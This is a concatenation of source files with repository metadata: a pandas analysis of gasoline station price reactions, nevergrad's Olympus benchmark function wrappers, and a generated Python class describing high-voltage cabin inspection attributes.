import statsmodels.api as sm
import statsmodels.formula.api as smf
path_dir_built = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_scraped_2011_2014')
path_dir_built_csv = os.path.join(path_dir_built, u'data_csv')
path_dir_built_ta = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_total_access')
path_dir_built_ta_json = os.path.join(path_dir_built_ta, 'data_json')
path_dir_built_ta_csv = os.path.join(path_dir_built_ta, 'data_csv')
path_dir_built_ta_graphs = os.path.join(path_dir_built_ta, 'data_graphs')
pd.set_option('float_format', '{:,.3f}'.format)
format_float_int = lambda x: '{:10,.0f}'.format(x)
format_float_float = lambda x: '{:10,.3f}'.format(x)
# #########
# LOAD DATA
# #########
# DF STATION INFO
df_info = pd.read_csv(os.path.join(path_dir_built_csv,
'df_station_info_final.csv'),
encoding = 'utf-8',
dtype = {'id_station' : str,
'adr_zip' : str,
'adr_dpt' : str,
'ci_1' : str,
'ci_ardt_1' :str,
'ci_2' : str,
'ci_ardt_2' : str,
'dpt' : str},
parse_dates = [u'day_%s' %i for i in range(4)]) # fix
df_info.set_index('id_station', inplace = True)
df_info = df_info[df_info['highway'] != 1]
# DF COMP
dict_comp_dtype = {'id_ta_{:d}'.format(i) : str for i in range(23)}
dict_comp_dtype['id_station'] = str
df_comp = pd.read_csv(os.path.join(path_dir_built_csv,
'df_comp.csv'),
dtype = dict_comp_dtype,
encoding = 'utf-8')
df_comp.set_index('id_station', inplace = True)
# DF PRICES
df_prices_ht = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ht_final.csv'),
parse_dates = ['date'])
df_prices_ht.set_index('date', inplace = True)
df_prices_ttc = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ttc_final.csv'),
parse_dates = ['date'])
df_prices_ttc.set_index('date', inplace = True)
df_prices = df_prices_ttc
# CHOOSE DISTANCE
str_ta_ext = '_5km_dist_order'
# DF TOTAL ACCESS
df_ta = pd.read_csv(os.path.join(path_dir_built_ta_csv,
'df_total_access{:s}.csv'.format(str_ta_ext)),
dtype = {'id_station' : str,
'id_total_ta' : str,
'id_elf_ta' : str,
'ci_1' : str,
'ci_ardt_1' : str},
encoding = 'utf-8',
parse_dates = ['start', 'end',
'ta_date_beg',
'ta_date_end',
'date_min_total_ta',
'date_max_total_ta',
'date_min_elf_ta',
'date_max_elf_ta'])
df_ta.set_index('id_station', inplace = True)
# DF REG RES
df_res = pd.read_csv(os.path.join(path_dir_built_ta_csv,
'df_res_indiv{:s}.csv'.format(str_ta_ext)),
encoding = 'utf-8',
dtype = {'id_station' : str})
df_res.set_index('id_station', inplace = True)
# CHECK FOR DUPLICATES IN DF RES (AND DROP)
# one case: Total => Avia hence tta_comp and tta_tot (drop)
#import collections
#dict_cnt = dict(Counter(list(df_res.index)))
#print([k for k,v in cnt.items() if v != 1])
df_res = df_res[df_res.index != '4600001']
# ENRICH DF REG
df_res = pd.merge(df_res,
df_ta[['name',
'adr_street',
'adr_city',
'ci_1',
'ci_ardt_1',
'reg',
'dpt',
'group',
'brand_last',
'group_last',
'group_type_last',
'id_total_ta',
'dist_total_ta',
'date_min_total_ta',
'date_max_total_ta',
'id_elf_ta',
'dist_elf_ta',
'date_min_elf_ta',
'date_max_elf_ta',
'ta_date_beg',
'ta_date_end']],
left_index = True,
right_index = True,
how = 'left')
df_res['tr_id'] = None
df_res['tr_dist'] = None
#df_res['tr_date_min'] = pd.NaT
#df_res['tr_date_max'] = pd.NaT
df_res.rename(columns = {'ta_date_beg' : 'tr_date_min',
'ta_date_end' : 'tr_date_max'},
inplace = True)
for str_treated in ['tta_comp', 'tta_tot']:
df_res.loc[df_res['treated'] == str_treated,
'tr_id'] = df_res['id_total_ta']
df_res.loc[df_res['treated'] == str_treated,
'tr_dist'] = df_res['dist_total_ta']
df_res.loc[df_res['treated'] == str_treated,
'tr_date_min'] = df_res['date_min_total_ta']
df_res.loc[df_res['treated'] == str_treated,
'tr_date_max'] = df_res['date_max_total_ta']
for str_treated in ['eta_comp']:
df_res.loc[df_res['treated'] == str_treated,
'tr_id'] = df_res['id_elf_ta']
df_res.loc[df_res['treated'] == str_treated,
'tr_dist'] = df_res['dist_elf_ta']
df_res.loc[df_res['treated'] == str_treated,
'tr_date_min'] = df_res['date_min_elf_ta']
df_res.loc[df_res['treated'] == str_treated,
'tr_date_max'] = df_res['date_max_elf_ta']
df_res.drop(['id_total_ta', 'dist_total_ta',
'date_min_total_ta', 'date_max_total_ta',
'id_elf_ta', 'dist_elf_ta',
'date_min_elf_ta', 'date_max_elf_ta'],
axis = 1,
inplace = True)
# DF RES RONAN
df_res_ronan = pd.read_csv(os.path.join(path_dir_built_ta_csv,
'df_res_indiv_ronan.csv'),
encoding = 'utf-8',
dtype = {'id_station' : str})
df_res_ronan.set_index('id_station', inplace = True)
df_res = pd.merge(df_res,
df_res_ronan[['Price5', 'Price5reg', 'Price5Ind']],
left_index = True,
right_index = True,
how = 'left')
df_res['c_treatment'] = df_res['c_treatment'] * 100
print(u"Inspect Ronan's estimates:")
print(df_res[(df_res['treated'] == 'tta_comp')]\
[['Price5', 'Price5reg', 'c_treatment', 'p_treatment']][0:10].to_string())
df_res['diff'] = df_res['c_treatment'] - df_res['Price5reg']
df_res.sort('diff', ascending = False, inplace = True)
print()
print(u"Inspect extreme diffs:")
print(df_res[(df_res['treated'] == 'tta_comp')]\
[['Price5', 'Price5reg', 'c_treatment', 'p_treatment', 'diff']][0:10].to_string())
print(df_res[(df_res['treated'] == 'tta_comp')]\
[['Price5', 'Price5reg', 'c_treatment', 'p_treatment', 'diff']][-10:].to_string())
# diff by region
print()
print(u"Inspect avg diff by region:")
for reg in df_res['reg'].unique():
#df_res_reg = df_res[df_res['reg'] == reg]
df_res_reg = df_res[(df_res['reg'] == reg) &\
(df_res['treated'] == 'tta_comp') &
(df_res['p_treatment'] <= 0.05)]
print(u"{:s} {:.2f}".format(reg, (df_res_reg['Price5Ind'] - df_res_reg['Price5reg']).mean()))
## ##########
## OVERVIEW
## ##########
#
## todo: graphs of reactions above 0.03 or 0.04 cents
## todo: check share supermarkets vs. oil/indep
## todo: check reaction vs. station fe (todo elsewhere)
## todo: check closest competitor(s) of total access systematically? (based on pair price stats)
#
## treatment value thresholds for display
#ls_val = [i/100.0 for i in range(1, 10)]
#
## cent display
#pd.set_option('float_format', '{:,.2f}'.format)
#df_res['c_treatment'] = df_res['c_treatment'] * 100
#ls_val = [i for i in range(1, 10)]
#
#ls_pctiles = [0.1, 0.25, 0.5, 0.75, 0.9]
#
#for str_treated in ['tta', 'tta_tot', 'tta_comp', 'eta', 'eta_comp']:
# str_treated = 'tta_comp'
# df_res_sub = df_res[df_res['treated'] == str_treated]
#
# print()
# print(u'Overview of regression results for {:s}'.format(str_treated))
# print(df_res_sub.describe(percentiles = ls_pctiles).to_string())
#
# # Inspect significant treatments
# df_res_sub_sig = df_res_sub[df_res_sub['p_treatment'] <= 0.05]
# print()
# print(u'Nb sig treatments:', len(df_res_sub_sig))
# print(u'Nb positive/negative reactions above threshold:')
#
# ls_nb_inc = [len(df_res_sub_sig[df_res_sub_sig['c_treatment'] >= val])\
# for val in ls_val]
# ls_nb_dec = [len(df_res_sub_sig[df_res_sub_sig['c_treatment'] <= -val])\
# for val in ls_val]
# df_su_sig_reacs = pd.DataFrame([ls_nb_inc, ls_nb_dec],
# columns = ls_val,
# index = ['Nb pos', 'Nb neg'])
# print(df_su_sig_reacs.to_string())
#
## treatment distributions by station type for tta_comp
#print()
#print(u'Overview of indiv effects by group type for tta_comp:')
#df_res_sub = df_res[df_res['treated'] == 'tta_comp']
#ls_se_gp_ies = []
#ls_temp_loop = [('Sup', df_res_sub[df_res_sub['group_type_last'] == 'SUP']),
# ('Esso Exp.', df_res_sub[df_res_sub['brand_last'] == 'ESSO_EXPRESS']),
# ('Esso', df_res_sub[df_res_sub['brand_last'] == 'ESSO']),
# ('NSup', df_res_sub[df_res_sub['group_type_last'] != 'SUP']),
# ('NSup NEExp',
# df_res_sub[(df_res_sub['group_type_last'] != 'SUP') &\
# (df_res_sub['brand_last'] != 'ESSO_EXPRESS')])]
#for str_temp, df_temp in ls_temp_loop:
# ls_se_gp_ies.append(df_temp['c_treatment'].describe())
#df_su_gp_ies = pd.concat(ls_se_gp_ies,
# axis = 1,
# keys = [x[0] for x in ls_temp_loop])
#print(df_su_gp_ies.to_string())
#
### ########
### GRAPHS
### ########
##
### Move?
##
### Graphs of competitors or group Total stations affected
##df_res_check = df_res[(df_res['treated'].isin(['tta_tot',
## 'tta_comp',
## 'eta_comp'])) &\
## (df_res['p_treatment'] <= 0.05) &\
## (df_res['c_treatment'].abs() >= 3)] # 0.04 if not using cent
##
##for id_station, row in df_res_check.iterrows():
## fig = plt.figure(figsize=(16,6))
## ax1 = fig.add_subplot(111)
## l2 = ax1.plot(df_prices_ttc.index, df_prices_ttc[row['tr_id']].values,
## c = 'b', label = 'Station {:s}'.format(df_info.ix[row['tr_id']]['brand_0']))
## l3 = ax1.plot(df_prices_ttc.index, df_prices_ttc.mean(1).values,
## c = 'r', label = 'Moyenne nationale')
## l1 = ax1.plot(df_prices_ttc.index, df_prices_ttc[id_station].values,
## c = 'g', label = 'Station {:s}'.format(df_info.ix[id_station]['brand_0']))
## lns = l1 + l2 + l3
## labs = [l.get_label() for l in lns]
## ax1.legend(lns, labs, loc=0)
## ax1.axvline(x = row['tr_date_min'], color = 'b', ls = '--', alpha = 1.0, lw = 1.5)
## ax1.axvline(x = row['tr_date_max'], color = 'b', ls = '--', alpha = 1.0, lw = 1.5)
## ax1.grid()
## plt.tight_layout()
## #plt.show()
## reac_sign = 'pos'
## if row['c_treatment'] < 0:
## reac_sign = 'neg'
## plt.savefig(os.path.join(path_dir_built_ta_graphs,
## 'price_series_treated',
## '{:s}_{:s}_{:.2f}_{:s}.png'.format(row['treated'],
## reac_sign,
## np.abs(row['c_treatment']),
## id_station)),
## dpi = 200,
## bbox_inches='tight')
## plt.close()
| [
"echamayou@gmail.com"
] | echamayou@gmail.com |
974266c40be29c89c2283e836d50a53fbe2b5395 | bee77315d08def61c1155930285211ef3d8d7654 | /nevergrad/functions/olympussurfaces/core.py | 978320088ddd141745feb7073f77e1a0df4ec471 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | facebookresearch/nevergrad | d2da592c1bf3b7c398392b3d39217a3753a4912c | daddb18184bf64ba9082ecc55a56e07429a23103 | refs/heads/main | 2023-09-04T10:53:42.903505 | 2023-08-30T17:10:37 | 2023-08-30T17:10:37 | 158,468,845 | 3,526 | 367 | MIT | 2023-09-11T13:37:36 | 2018-11-21T00:33:17 | Python | UTF-8 | Python | false | false | 4,355 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Based on https://github.com/aspuru-guzik-group/olympus
import numpy as np
from functools import partial
from nevergrad.parametrization import parameter as p
from ..base import ExperimentFunction
import nevergrad as ng
class OlympusSurface(ExperimentFunction):
SURFACE_KINDS = (
"Michalewicz",
"AckleyPath",
"Dejong",
"HyperEllipsoid",
"Levy",
"Michalewicz",
"Rastrigin",
"Rosenbrock",
"Schwefel",
"StyblinskiTang",
"Zakharov",
"DiscreteAckley",
"DiscreteDoubleWell",
"DiscreteMichalewicz",
"LinearFunnel",
"NarrowFunnel",
"GaussianMixture",
)
def __init__(
self, kind: str, dimension: int = 10, noise_kind: str = "GaussianNoise", noise_scale: float = 1
) -> None:
self.kind = kind
self.param_dim = dimension
self.noise_kind = noise_kind
assert self.kind in OlympusSurface.SURFACE_KINDS
assert self.noise_kind in ["GaussianNoise", "UniformNoise", "GammaNoise"]
self.noise_scale = noise_scale
self.surface = partial(self._simulate_surface, noise=True)
self.surface_without_noise = partial(self._simulate_surface, noise=False)
parametrization = p.Array(shape=(dimension,))
parametrization.function.deterministic = False
super().__init__(self.surface, parametrization)
self.shift = self.parametrization.random_state.normal(size=self.dimension)
def _simulate_surface(self, x: np.ndarray, noise: bool = True) -> float:
try:
from olympus.surfaces import import_surface # pylint: disable=import-outside-toplevel
from olympus import noises
except ImportError as e:
raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
if noise:
noise = noises.Noise(kind=self.noise_kind, scale=self.noise_scale)
surface = import_surface(self.kind)(param_dim=self.param_dim, noise=noise)
else:
surface = import_surface(self.kind)(param_dim=self.param_dim)
return surface.run(x - self.shift)[0][0]
def evaluation_function(self, *recommendations) -> float:
"""Averages multiple evaluations if necessary"""
x = recommendations[0].value
return self.surface_without_noise(x - self.shift)
class OlympusEmulator(ExperimentFunction):
DATASETS = (
"suzuki",
"fullerenes",
"colors_bob",
"photo_wf3",
"snar",
"alkox",
"benzylation",
"photo_pce10",
"hplc",
"colors_n9",
)
def __init__(self, dataset_kind: str = "alkox", model_kind: str = "NeuralNet") -> None:
self.dataset_kind = dataset_kind
self.model_kind = model_kind
assert self.dataset_kind in OlympusEmulator.DATASETS
assert self.model_kind in ["BayesNeuralNet", "NeuralNet"]
parametrization = self._get_parametrization()
parametrization.function.deterministic = False
parametrization.set_name("")
super().__init__(self._simulate_emulator, parametrization)
def _get_parametrization(self) -> p.Parameter:
try:
from olympus.datasets import Dataset # pylint: disable=import-outside-toplevel
except ImportError as e:
raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
dataset = Dataset(self.dataset_kind)
dimension = dataset.shape[1] - 1
bounds = list(zip(*dataset.param_space.param_bounds))
return p.Array(shape=(dimension,), lower=bounds[0], upper=bounds[1])
def _simulate_emulator(self, x: np.ndarray) -> float:
try:
from olympus import Emulator # pylint: disable=import-outside-toplevel
except ImportError as e:
raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
emulator = Emulator(dataset=self.dataset_kind, model=self.model_kind)
return emulator.run(x)[0][0] * (-1 if emulator.get_goal() == "maximize" else 1)
| [
"noreply@github.com"
] | facebookresearch.noreply@github.com |
b7c40d61a3c77f55910703ef873c867fe577ab01 | 0e478f3d8b6c323c093455428c9094c45de13bac | /src/OTLMOW/OEFModel/Classes/HSCabineLegacy.py | b135fa0033f6f9bb78035d3c47a8967a43a5ba9a | [
"MIT"
] | permissive | davidvlaminck/OTLMOW | c6eae90b2cab8a741271002cde454427ca8b75ba | 48f8c357c475da1d2a1bc7820556843d4b37838d | refs/heads/main | 2023-01-12T05:08:40.442734 | 2023-01-10T15:26:39 | 2023-01-10T15:26:39 | 432,681,113 | 3 | 1 | MIT | 2022-06-20T20:36:00 | 2021-11-28T10:28:24 | Python | UTF-8 | Python | false | false | 21,778 | py | # coding=utf-8
from OTLMOW.OEFModel.EMObject import EMObject
from OTLMOW.OEFModel.EMAttribuut import EMAttribuut
from OTLMOW.OTLModel.Datatypes.StringField import StringField
# Generated with OEFClassCreator. To modify: extend, do not edit
class HSCabineLegacy(EMObject):
"""subonderdeel van HS-installatie"""
typeURI = 'https://lgc.data.wegenenverkeer.be/ns/installatie#HSCabineLegacy'
label = 'Hoogspanningscabine (Legacy)'
def __init__(self):
super().__init__()
self._alleMetalenOnderdelenGeaardVerbonden = EMAttribuut(field=StringField,
naam='alle metalen onderdelen geaard&verbonden',
label='alle metalen onderdelen geaard&verbonden',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.alleMetalenOnderdelenGeaardVerbonden',
definitie='Definitie nog toe te voegen voor eigenschap alle metalen onderdelen geaard&verbonden',
owner=self)
self._alleToegangsdeurenSluitenPerfect = EMAttribuut(field=StringField,
naam='alle toegangsdeuren sluiten perfect',
label='alle toegangsdeuren sluiten perfect',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.alleToegangsdeurenSluitenPerfect',
definitie='Definitie nog toe te voegen voor eigenschap alle toegangsdeuren sluiten perfect',
owner=self)
self._alleVerlichtingsarmaturenFunctioneren = EMAttribuut(field=StringField,
naam='alle verlichtingsarmaturen functioneren',
label='alle verlichtingsarmaturen functioneren',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.alleVerlichtingsarmaturenFunctioneren',
definitie='Definitie nog toe te voegen voor eigenschap alle verlichtingsarmaturen functioneren',
owner=self)
self._bezoekkaartAanwezigEnIngevuld = EMAttribuut(field=StringField,
naam='bezoekkaart aanwezig en ingevuld',
label='bezoekkaart aanwezig en ingevuld',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.bezoekkaartAanwezigEnIngevuld',
definitie='Definitie nog toe te voegen voor eigenschap bezoekkaart aanwezig en ingevuld',
owner=self)
self._binnenGeenSpinnenwebOngedierteZand = EMAttribuut(field=StringField,
naam='binnen geen spinnenweb/ongedierte/zand',
label='binnen geen spinnenweb/ongedierte/zand',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.binnenGeenSpinnenwebOngedierteZand',
definitie='Definitie nog toe te voegen voor eigenschap binnen geen spinnenweb/ongedierte/zand',
owner=self)
self._geenScheurenOpeningenInBehuizing = EMAttribuut(field=StringField,
naam='geen scheuren/openingen in behuizing',
label='geen scheuren/openingen in behuizing',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.geenScheurenOpeningenInBehuizing',
definitie='Definitie nog toe te voegen voor eigenschap geen scheuren/openingen in behuizing',
owner=self)
self._geenStootStruikelgevaar = EMAttribuut(field=StringField,
naam='geen stoot / struikelgevaar',
label='geen stoot / struikelgevaar',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.geenStootStruikelgevaar',
definitie='Definitie nog toe te voegen voor eigenschap geen stoot / struikelgevaar',
owner=self)
self._geenVreemdeMaterialenAanwezig = EMAttribuut(field=StringField,
naam='geen vreemde materialen aanwezig',
label='geen vreemde materialen aanwezig',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.geenVreemdeMaterialenAanwezig',
definitie='Definitie nog toe te voegen voor eigenschap geen vreemde materialen aanwezig',
owner=self)
self._geisoleerdeHandschInPerfecteStaat = EMAttribuut(field=StringField,
naam='geisoleerde handsch in perfecte staat',
label='geisoleerde handsch in perfecte staat',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#EMObject.geisoleerdeHandschInPerfecteStaat',
definitie='Definitie nog toe te voegen voor eigenschap geisoleerde handsch in perfecte staat',
owner=self)
self._indicatieplatenAanwezigOpToegangsdeur = EMAttribuut(field=StringField,
naam='indicatieplaten aanwezig op toegangsdeur',
label='indicatieplaten aanwezig op toegangsdeur',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.indicatieplatenAanwezigOpToegangsdeur',
definitie='Definitie nog toe te voegen voor eigenschap indicatieplaten aanwezig op toegangsdeur',
owner=self)
self._isolerendSasInGoedeStaat = EMAttribuut(field=StringField,
naam='isolerend sas in goede staat',
label='isolerend sas in goede staat',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.isolerendSasInGoedeStaat',
definitie='Definitie nog toe te voegen voor eigenschap isolerend sas in goede staat',
owner=self)
self._kabelkelderVrijVanWater = EMAttribuut(field=StringField,
naam='kabelkelder vrij van water',
label='kabelkelder vrij van water',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#EMObject.kabelkelderVrijVanWater',
definitie='Definitie nog toe te voegen voor eigenschap kabelkelder vrij van water',
owner=self)
self._noodverlichtingsarmaturenFunctioneren = EMAttribuut(field=StringField,
naam='noodverlichtingsarmaturen functioneren',
label='noodverlichtingsarmaturen functioneren',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.noodverlichtingsarmaturenFunctioneren',
definitie='Definitie nog toe te voegen voor eigenschap noodverlichtingsarmaturen functioneren',
owner=self)
self._opmerkingenOverHsCabine = EMAttribuut(field=StringField,
naam='opmerkingen over HS cabine',
label='opmerkingen over HS cabine',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.opmerkingenOverHsCabine',
definitie='Definitie nog toe te voegen voor eigenschap opmerkingen over HS cabine',
owner=self)
self._slotenEnScharnierenInGoedeStaat = EMAttribuut(field=StringField,
naam='sloten en scharnieren in goede staat',
label='sloten en scharnieren in goede staat',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.slotenEnScharnierenInGoedeStaat',
definitie='Definitie nog toe te voegen voor eigenschap sloten en scharnieren in goede staat',
owner=self)
self._thermostaatHygrostaatFunctioneert = EMAttribuut(field=StringField,
naam='thermostaat / hygrostaat functioneert',
label='thermostaat / hygrostaat functioneert',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.thermostaatHygrostaatFunctioneert',
definitie='Definitie nog toe te voegen voor eigenschap thermostaat / hygrostaat functioneert',
owner=self)
self._toegangVrijVanOnkruidStruikenTakken = EMAttribuut(field=StringField,
naam='toegang vrij van onkruid/struiken/takken',
label='toegang vrij van onkruid/struiken/takken',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.toegangVrijVanOnkruidStruikenTakken',
definitie='Definitie nog toe te voegen voor eigenschap toegang vrij van onkruid/struiken/takken',
owner=self)
self._toegangspadInGoedeStaat = EMAttribuut(field=StringField,
naam='toegangspad in goede staat',
label='toegangspad in goede staat',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.toegangspadInGoedeStaat',
definitie='Definitie nog toe te voegen voor eigenschap toegangspad in goede staat',
owner=self)
self._verluchtingsroostersInGoedeStaat = EMAttribuut(field=StringField,
naam='verluchtingsroosters in goede staat',
label='verluchtingsroosters in goede staat',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.verluchtingsroostersInGoedeStaat',
definitie='Definitie nog toe te voegen voor eigenschap verluchtingsroosters in goede staat',
owner=self)
self._verwarmingstoestelNietAfgedekt = EMAttribuut(field=StringField,
naam='verwarmingstoestel niet afgedekt',
label='verwarmingstoestel niet afgedekt',
objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.verwarmingstoestelNietAfgedekt',
definitie='Definitie nog toe te voegen voor eigenschap verwarmingstoestel niet afgedekt',
owner=self)
@property
def alleMetalenOnderdelenGeaardVerbonden(self):
"""Definitie nog toe te voegen voor eigenschap alle metalen onderdelen geaard&verbonden"""
return self._alleMetalenOnderdelenGeaardVerbonden.waarde
@alleMetalenOnderdelenGeaardVerbonden.setter
def alleMetalenOnderdelenGeaardVerbonden(self, value):
self._alleMetalenOnderdelenGeaardVerbonden.set_waarde(value, owner=self)
@property
def alleToegangsdeurenSluitenPerfect(self):
"""Definitie nog toe te voegen voor eigenschap alle toegangsdeuren sluiten perfect"""
return self._alleToegangsdeurenSluitenPerfect.waarde
@alleToegangsdeurenSluitenPerfect.setter
def alleToegangsdeurenSluitenPerfect(self, value):
self._alleToegangsdeurenSluitenPerfect.set_waarde(value, owner=self)
@property
def alleVerlichtingsarmaturenFunctioneren(self):
"""Definitie nog toe te voegen voor eigenschap alle verlichtingsarmaturen functioneren"""
return self._alleVerlichtingsarmaturenFunctioneren.waarde
@alleVerlichtingsarmaturenFunctioneren.setter
def alleVerlichtingsarmaturenFunctioneren(self, value):
self._alleVerlichtingsarmaturenFunctioneren.set_waarde(value, owner=self)
@property
def bezoekkaartAanwezigEnIngevuld(self):
"""Definitie nog toe te voegen voor eigenschap bezoekkaart aanwezig en ingevuld"""
return self._bezoekkaartAanwezigEnIngevuld.waarde
@bezoekkaartAanwezigEnIngevuld.setter
def bezoekkaartAanwezigEnIngevuld(self, value):
self._bezoekkaartAanwezigEnIngevuld.set_waarde(value, owner=self)
@property
def binnenGeenSpinnenwebOngedierteZand(self):
"""Definitie nog toe te voegen voor eigenschap binnen geen spinnenweb/ongedierte/zand"""
return self._binnenGeenSpinnenwebOngedierteZand.waarde
@binnenGeenSpinnenwebOngedierteZand.setter
def binnenGeenSpinnenwebOngedierteZand(self, value):
self._binnenGeenSpinnenwebOngedierteZand.set_waarde(value, owner=self)
@property
def geenScheurenOpeningenInBehuizing(self):
"""Definitie nog toe te voegen voor eigenschap geen scheuren/openingen in behuizing"""
return self._geenScheurenOpeningenInBehuizing.waarde
@geenScheurenOpeningenInBehuizing.setter
def geenScheurenOpeningenInBehuizing(self, value):
self._geenScheurenOpeningenInBehuizing.set_waarde(value, owner=self)
@property
def geenStootStruikelgevaar(self):
"""Definitie nog toe te voegen voor eigenschap geen stoot / struikelgevaar"""
return self._geenStootStruikelgevaar.waarde
@geenStootStruikelgevaar.setter
def geenStootStruikelgevaar(self, value):
self._geenStootStruikelgevaar.set_waarde(value, owner=self)
@property
def geenVreemdeMaterialenAanwezig(self):
"""Definitie nog toe te voegen voor eigenschap geen vreemde materialen aanwezig"""
return self._geenVreemdeMaterialenAanwezig.waarde
@geenVreemdeMaterialenAanwezig.setter
def geenVreemdeMaterialenAanwezig(self, value):
self._geenVreemdeMaterialenAanwezig.set_waarde(value, owner=self)
@property
def geisoleerdeHandschInPerfecteStaat(self):
"""Definitie nog toe te voegen voor eigenschap geisoleerde handsch in perfecte staat"""
return self._geisoleerdeHandschInPerfecteStaat.waarde
@geisoleerdeHandschInPerfecteStaat.setter
def geisoleerdeHandschInPerfecteStaat(self, value):
self._geisoleerdeHandschInPerfecteStaat.set_waarde(value, owner=self)
@property
def indicatieplatenAanwezigOpToegangsdeur(self):
"""Definitie nog toe te voegen voor eigenschap indicatieplaten aanwezig op toegangsdeur"""
return self._indicatieplatenAanwezigOpToegangsdeur.waarde
@indicatieplatenAanwezigOpToegangsdeur.setter
def indicatieplatenAanwezigOpToegangsdeur(self, value):
self._indicatieplatenAanwezigOpToegangsdeur.set_waarde(value, owner=self)
@property
def isolerendSasInGoedeStaat(self):
"""Definitie nog toe te voegen voor eigenschap isolerend sas in goede staat"""
return self._isolerendSasInGoedeStaat.waarde
@isolerendSasInGoedeStaat.setter
def isolerendSasInGoedeStaat(self, value):
self._isolerendSasInGoedeStaat.set_waarde(value, owner=self)
@property
def kabelkelderVrijVanWater(self):
"""Definitie nog toe te voegen voor eigenschap kabelkelder vrij van water"""
return self._kabelkelderVrijVanWater.waarde
@kabelkelderVrijVanWater.setter
def kabelkelderVrijVanWater(self, value):
self._kabelkelderVrijVanWater.set_waarde(value, owner=self)
@property
def noodverlichtingsarmaturenFunctioneren(self):
"""Definitie nog toe te voegen voor eigenschap noodverlichtingsarmaturen functioneren"""
return self._noodverlichtingsarmaturenFunctioneren.waarde
@noodverlichtingsarmaturenFunctioneren.setter
def noodverlichtingsarmaturenFunctioneren(self, value):
self._noodverlichtingsarmaturenFunctioneren.set_waarde(value, owner=self)
@property
def opmerkingenOverHsCabine(self):
"""Definitie nog toe te voegen voor eigenschap opmerkingen over HS cabine"""
return self._opmerkingenOverHsCabine.waarde
@opmerkingenOverHsCabine.setter
def opmerkingenOverHsCabine(self, value):
self._opmerkingenOverHsCabine.set_waarde(value, owner=self)
@property
def slotenEnScharnierenInGoedeStaat(self):
"""Definitie nog toe te voegen voor eigenschap sloten en scharnieren in goede staat"""
return self._slotenEnScharnierenInGoedeStaat.waarde
@slotenEnScharnierenInGoedeStaat.setter
def slotenEnScharnierenInGoedeStaat(self, value):
self._slotenEnScharnierenInGoedeStaat.set_waarde(value, owner=self)
@property
def thermostaatHygrostaatFunctioneert(self):
"""Definitie nog toe te voegen voor eigenschap thermostaat / hygrostaat functioneert"""
return self._thermostaatHygrostaatFunctioneert.waarde
@thermostaatHygrostaatFunctioneert.setter
def thermostaatHygrostaatFunctioneert(self, value):
self._thermostaatHygrostaatFunctioneert.set_waarde(value, owner=self)
@property
def toegangVrijVanOnkruidStruikenTakken(self):
"""Definitie nog toe te voegen voor eigenschap toegang vrij van onkruid/struiken/takken"""
return self._toegangVrijVanOnkruidStruikenTakken.waarde
@toegangVrijVanOnkruidStruikenTakken.setter
def toegangVrijVanOnkruidStruikenTakken(self, value):
self._toegangVrijVanOnkruidStruikenTakken.set_waarde(value, owner=self)
@property
def toegangspadInGoedeStaat(self):
"""Definitie nog toe te voegen voor eigenschap toegangspad in goede staat"""
return self._toegangspadInGoedeStaat.waarde
@toegangspadInGoedeStaat.setter
def toegangspadInGoedeStaat(self, value):
self._toegangspadInGoedeStaat.set_waarde(value, owner=self)
@property
def verluchtingsroostersInGoedeStaat(self):
"""Definitie nog toe te voegen voor eigenschap verluchtingsroosters in goede staat"""
return self._verluchtingsroostersInGoedeStaat.waarde
@verluchtingsroostersInGoedeStaat.setter
def verluchtingsroostersInGoedeStaat(self, value):
self._verluchtingsroostersInGoedeStaat.set_waarde(value, owner=self)
@property
def verwarmingstoestelNietAfgedekt(self):
"""Definitie nog toe te voegen voor eigenschap verwarmingstoestel niet afgedekt"""
return self._verwarmingstoestelNietAfgedekt.waarde
@verwarmingstoestelNietAfgedekt.setter
def verwarmingstoestelNietAfgedekt(self, value):
self._verwarmingstoestelNietAfgedekt.set_waarde(value, owner=self)
| [
"david.vlaminck@mow.vlaanderen.be"
] | david.vlaminck@mow.vlaanderen.be |
6db3a6d1194dfc0eef30308a005fc669bc41abed | 8b62e8d1439c36dadc98ad5656459251acb15200 | /uncertainty/__init__.py | 23e5e6fff1b8927f5cf759b175f19bc65fc70afb | [
"Apache-2.0"
